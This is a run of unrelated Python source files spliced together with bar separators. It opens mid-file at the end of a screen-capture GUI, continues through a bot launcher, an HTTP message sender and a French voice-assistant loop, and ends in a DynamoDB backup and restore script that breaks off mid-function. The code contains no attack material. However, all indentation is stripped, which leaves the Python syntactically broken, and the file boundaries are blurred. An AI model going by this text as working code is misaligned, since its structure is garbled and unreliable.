global Time_ReadOut
self.countTime.config( text = Time_ReadOut )
def Label_Count_Update(self):
global image_Count
self.Label_Count_Time()
self.countValue.config( text = image_Count )
def Button_StartPause(self):
if self.inProgress == False:
self.captureButton.config( text = "Pause " )
self.inProgress = True
Thread_Start( self.Label_Count_Update )
else:
self.captureButton.config( text = "Capture" )
self.inProgress = False
Thread_Stop()
# def Toggle_OnFocus(self):
# global AppFocus
# AppFocus = self.checkVar.get()
def Button_Speed(self):
if self.currentSpeed == 0.1:
self.currentSpeed = 1.0
self.speedButton.config( text = "1X" )
elif self.currentSpeed == 0.5:
self.currentSpeed = 0.1
self.speedButton.config( text = "10X" )
else:
self.currentSpeed = 0.5
self.speedButton.config( text = "5X" )
self.Adjust_Speed()
def Adjust_Speed( self ):
global Speed_Adjust
Speed_Adjust = Record_Speed * self.currentSpeed
def Button_Stop(self):
Thread_Stop()
def Button_Close(self):
Thread_Stop()
print("Closing!")
time.sleep(0.1)
sys.exit()
# if a path is injected in, override?
if( len( os.environ["captureLocation"] ) > 2 ):
Record_Path[0] = os.environ["captureLocation"]
print( "Capturing to location: " + str(Record_Path) );
my_gui = Capture_Gui()
my_gui.master.title( 'ScreenCapture: ' )
my_gui.master.geometry('400x28')
my_gui.master.resizable(0, 0)
my_gui.mainloop()
|
forgotten.py
|
# -*- coding: utf-8 -*-
#
# forgotten
# https://github.com/rmed/forgotten
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Rafael Medina García <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import signal
import sys
import threading
import time
from forgotten.conf import parse_conf, get_logger
# Setup logging
logger = get_logger('launcher')
# Parse config file
parse_conf()
# Initialize database
from forgotten.dbops import DB, check_db
check_db(DB)
# Initialize bot
from forgotten.bot import bot
# Initialize worker thread
from forgotten.helper import forgotten_worker
WORKER = threading.Thread(target=forgotten_worker, daemon=True)
WORKER.start()
def sigint_handler(signal, frame):
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGINT, sigint_handler)
print('Press Control+C to exit')
while True:
try:
logger.info('Start polling')
bot.polling(none_stop=True)
except Exception as e:
logger.error(e)
logger.info('Start sleep')
time.sleep(10)
logger.info('Ended sleep')
pass
logger.info('Stop polling')
bot.stop_polling()
|
message_sender.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import requests
import threading
import logging
from alfa_agent.core.api.util.util import Util
class MessageSender:
def __init__(self, url):
self.url = url
self.headers = {'content-type': 'application/json'}
def send(self, payload):
t = threading.Thread(target=worker, kwargs=dict(url=self.url, headers=self.headers, payload=payload))
t.start()
def worker(url=None, headers=None, payload=None):
logger = logging.getLogger(__name__)
try:
_payload = json.loads(payload) if type(payload) is str else payload
_payload['from'] = Util.read_prop("agent.messaging_id")
assert _payload['from']
logger.debug("Sending message with payload: {}".format(json.dumps(_payload)))
resp = requests.post(url, data=json.dumps(_payload), headers=headers)
logger.info("Sent message to url:" + url if resp is not None and resp.status_code == 200
else "Failed to send message to url:" + url)
except ConnectionError as e:
logger.error("Cannot connect to server.", exc_info=True)
|
main.py
|
from utils import *
from process import *
from server import run_server
import multiprocessing,requests
p = multiprocessing.Process(target=run_server, args=())
p.daemon = True
path_volume= abspath(__file__)+"_data/"
keyword= "ok assistant"
list_stop= get_tree_by_tag("start>stop")['keywords']
volumes={str(path_volume):{'bind': '/volume', 'mode': 'rw'}}
DEFAULT_HOST= "127.0.0.1"
DEFAULT_PORT= "5000"
def url(route="",host=DEFAULT_HOST,port=DEFAULT_PORT):
return 'http://'+host+':'+port+'/'+route
if __name__ == '__main__':
# show the assistant text line (Je suis votre assistant....)
show= True
# run server
p.start()
if not auth():
text_to_speech("l'authentification a échouée")
print("l'authentification a échouée")
else:
# sleep mode (waiting for the keyword)
while True:
if show:
print("\nJe suis votre assistant, dites: \n[\"ok assistant\"] pour m'appeler \n[\"quitter\"] pour quitter")
show= False
speech= speech_to_text("False")
# recognized a user request
if speech:
# if request is the keyword, then go to active mode
if keyword in speech:
show= True
# if mono-user mode activated, then authentification
Tree()
# if request is something else, then stay in sleep mode
else:
stop= False
for word in list_stop:
if word in speech:
stop= True
if stop:
print("Fin de programme...")
break
p.terminate()
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with DynamoDB Local).
"""
import argparse
import boto3
import datetime
import errno
import fnmatch
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from queue import Queue
from six.moves import input
from urllib.error import URLError, HTTPError
from urllib.request import urlopen
AWS_SLEEP_INTERVAL = 10 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
DATA_DIR = "data"
DATA_DUMP = "dump"
DEFAULT_PREFIX_SEPARATOR = "-"
CURRENT_WORKING_DIR = os.getcwd()
JSON_INDENT = 2
LOCAL_REGION = "local"
LOCAL_SLEEP_INTERVAL = 1 # seconds
LOG_LEVEL = "INFO"
MAX_BATCH_WRITE = 25 # DynamoDB limit
MAX_NUMBER_BACKUP_WORKERS = 25
MAX_RETRY = 6
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
PAY_PER_REQUEST_BILLING_MODE = "PAY_PER_REQUEST"
PROVISIONED_BILLING_MODE = "PROVISIONED"
RESTORE_WRITE_CAPACITY = 25
RESTORE_READ_CAPACITY = 25
SCHEMA_FILE = "schema.json"
THREAD_START_DELAY = 1 # seconds
json.JSONEncoder.default = lambda self, obj: (
obj.isoformat() if isinstance(obj, datetime.datetime) else None
)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
endpoint_url: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = (
urlopen(
METADATA_URL + "placement/availability-zone", data=None, timeout=5
)
.read()
.decode()
)
aws_region = azone[:-1]
except HTTPError as e:
logging.exception(
"Error determining region used for AWS client. Typo in code?\n\n"
+ str(e)
)
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(
service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
endpoint_url=endpoint_url,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile=profile, region=region, service="sts")
dynamo = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(
region, account_number, table
)
table_tags = dynamo.list_tags_of_resource(ResourceArn=table_arn)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(
bucket_object,
bucket,
bucket_object,
ExtraArgs={"ServerSideEncryption": "AES256"},
)
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(Bucket=bucket)
except s3.exceptions.ClientError as e:
logging.exception(
"S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e)
)
sys.exit(1)
try:
contents = s3.list_objects_v2(Bucket=bucket, Prefix=args.dumpPath)
except s3.exceptions.ClientError as e:
logging.exception(
"Issue listing contents of bucket " + bucket + "\n\n" + str(e)
)
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception(
"Unable to find file to restore from. "
"Confirm the name of the table you're restoring."
)
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception(
"compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e)
)
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception(
"Zip file would be too large. Update code to use Zip64 to continue."
)
sys.exit(1)
else:
logging.error(
"Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file"
)
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args["ExclusiveStartTableName"] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info(
'Cannot find "./%s", Now trying user provided absolute dump path..'
% args.dumpPath
)
try:
dir_list = os.listdir(args.dumpPath)
except OSError:
logging.info(
'Cannot find "%s", Now trying current working directory..'
% args.dumpPath
)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info(
'Cannot find "%s" directory containing dump files!' % dump_data_path
)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(
re.sub(
r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]
).split()[0]
):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(
r"([A-Z])", r" \1", source_table_name
).split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
if not args.noConfirm:
confirmation = input(
"About to delete table {}. Type 'yes' to continue: ".format(table_name)
)
if confirmation != "yes":
logging.warn("Confirmation not received. Stopping.")
sys.exit(1)
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying deletion of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying deletion of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info(
"Waiting for "
+ table_name
+ " table to be deleted.. ["
+ conn.describe_table(table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(
str(len(unprocessed_items))
+ " unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY))
)
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info(
"Max retries reached, failed to processed batch write: "
+ json.dumps(unprocessed_items, indent=JSON_INDENT)
)
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if (
conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
!= "ACTIVE"
):
logging.info(
"Waiting for "
+ table_name
+ " table to be "
+ verb
+ ".. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(
conn, table_name, read_capacity, write_capacity, wait=True
):
"""
Update provisioned throughput on the table to provided values
"""
logging.info(
"Updating "
+ table_name
+ " table read capacity to: "
+ str(read_capacity)
+ ", write capacity to: "
+ str(write_capacity)
)
while True:
try:
conn.update_table(
TableName=table_name,
ProvisionedThroughput={
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
},
)
break
except conn.exceptions.ResourceNotFoundException:
logging.info(
"Limit exceeded, retrying updating throughput of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput"
"of " + table_name + ".."
)
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name, billing_mode):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if billing_mode == PROVISIONED_BILLING_MODE:
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = table_global_secondary_indexes
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying creation of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info(
"Recreation of "
+ table_name
+ " completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"][
"ReadCapacityUnits"
]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"][
"WriteCapacityUnits"
]
# override table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo, table_name, read_capacity, original_write_capacity
)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args["ExclusiveStartKey"] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name, **optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error(
"EXCEEDED THROUGHPUT ON TABLE "
+ table_name
+ ". BACKUP FOR IT IS USELESS."
)
tableQueue.task_done()
f = open(
args.dumpPath
+ os.sep
+ table_name
+ os.sep
+ DATA_DIR
+ os.sep
+ str(i).zfill(4)
+ ".json",
"w+",
)
del scanned_table["ResponseMetadata"]
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False,
)
logging.info(
"Backup for "
+ table_name
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
tableQueue.task_done()
def prepare_provisioned_throughput_for_restore(provisioned_throughput):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
with the provisioned throughput attribute
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"ReadCapacityUnits": provisioned_throughput["ReadCapacityUnits"],
"WriteCapacityUnits": provisioned_throughput["WriteCapacityUnits"],
}
def prepare_gsi_for_restore(gsi):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"IndexName": gsi["IndexName"],
"KeySchema": gsi["KeySchema"],
"Projection": gsi["Projection"],
"ProvisionedThroughput": prepare_provisioned_throughput_for_restore(
gsi["ProvisionedThroughput"]
),
}
def do_restore(
dynamo,
sleep_interval,
source_table,
destination_table,
write_capacity,
billing_mode,
):
"""
Restore table
"""
logging.info(
"Starting restore for " + source_table + " to " + destination_table + ".."
)
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info(
'Cannot find "./%s/%s", Now trying current working directory..'
% (args.dumpPath, source_table)
)
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info(
'Cannot find "%s/%s" directory containing dump files!'
% (CURRENT_WORKING_DIR, source_table)
)
sys.exit(1)
table_data = json.load(
open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE)
)
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
if original_write_capacity == 0:
original_write_capacity = RESTORE_WRITE_CAPACITY
# ensure that read capacity is at least RESTORE_READ_CAPACITY
if original_read_capacity < RESTORE_READ_CAPACITY:
read_capacity = RESTORE_WRITE_CAPACITY
else:
read_capacity = original_read_capacity
if original_read_capacity == 0:
original_read_capacity = RESTORE_READ_CAPACITY
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
original_gsi_read_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
# keeps track of original gsi write capacity units. If provisioned capacity is 0, set to
# RESTORE_WRITE_CAPACITY as fallback given that 0 is not allowed for write capacities
original_gsi_write_capacity = gsi["ProvisionedThroughput"][
"WriteCapacityUnits"
]
if original_gsi_write_capacity == 0:
original_gsi_write_capacity = RESTORE_WRITE_CAPACITY
original_gsi_write_capacities.append(original_gsi_write_capacity)
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# keeps track of original gsi read capacity units. If provisioned capacity is 0, set to
# RESTORE_READ_CAPACITY as fallback given that 0 is not allowed for read capacities
original_gsi_read_capacity = gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
]
if original_gsi_read_capacity == 0:
original_gsi_read_capacity = RESTORE_READ_CAPACITY
original_gsi_read_capacities.append(original_gsi_read_capacity)
if (
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
< RESTORE_READ_CAPACITY
):
gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
] = RESTORE_READ_CAPACITY
# temp provisioned throughput for restore
table_provisioned_throughput = {
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
}
optional_args = {}
if billing_mode == PROVISIONED_BILLING_MODE:
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if not args.dataOnly:
logging.info(
"Creating "
+ destination_table
+ " table with temp write capacity of "
+ str(write_capacity)
)
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = [
prepare_gsi_for_restore(gsi) for gsi in table_global_secondary_indexes
]
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, "
"retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(
dynamo, destination_table, original_read_capacity, write_capacity, False
)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep
)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path
+ os.sep
+ source_table
+ os.sep
+ DATA_DIR
+ os.sep
+ data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug(
"Writing next "
+ str(MAX_BATCH_WRITE)
+ " items to "
+ destination_table
+ ".."
)
batch_write(
dynamo,
BATCH_WRITE_SLEEP_INTERVAL,
destination_table,
put_requests,
)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(
dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests
)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if (
int(write_capacity) != original_write_capacity
or int(read_capacity) != original_read_capacity
):
update_provisioned_throughput(
dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False,
)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
original_gsi_read_capacity = original_gsi_read_capacities.pop(0)
if (
original_gsi_write_capacity != wcu
or original_gsi_read_capacity != rcu
):
gsi_data.append(
{
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
original_gsi_read_capacity
),
"WriteCapacityUnits": int(
original_gsi_write_capacity
),
},
}
}
)
if gsi_data:
logging.info(
"Updating "
+ destination_table
+ " global secondary indexes write and read capacities as necessary.."
)
while True:
try:
dynamo.update_table(
TableName=destination_table,
GlobalSecondaryIndexUpdates=gsi_data,
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info(
"Restore for "
+ source_table
+ " to "
+ destination_table
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
else:
logging.info(
"Empty schema of "
+ source_table
